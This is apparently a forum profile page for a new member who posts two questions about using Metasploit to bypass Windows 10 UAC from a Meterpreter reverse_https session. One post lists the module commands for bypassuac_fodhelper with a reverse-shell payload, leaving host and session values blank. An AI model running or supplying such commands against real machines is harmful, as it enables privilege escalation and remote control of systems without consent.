Jump to content

p.c00d3r

Members
  • Posts

    2
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

p.c00d3r's Achievements

Newbie

Newbie (1/14)

  1. WINDOWS 10 x64. I tried bypassuac_injection/bypassuac_fodhelper/bypassuac_injection_xSS. May be I tried the wrong commands. use windows/local/bypassuac_fodhelper set SESSION set PAYLOAD windows/meterpreter/reverse_https set LHOST set LPORT run
  2. Hello, I am new in metasploit. I am using windows/meterpreter/reverse_https. How can I bypass UAC using exploits like fodhelper/injection etc.. I can bypass using local/ask.But it's not a good one. Thanks.
×
×
  • Create New...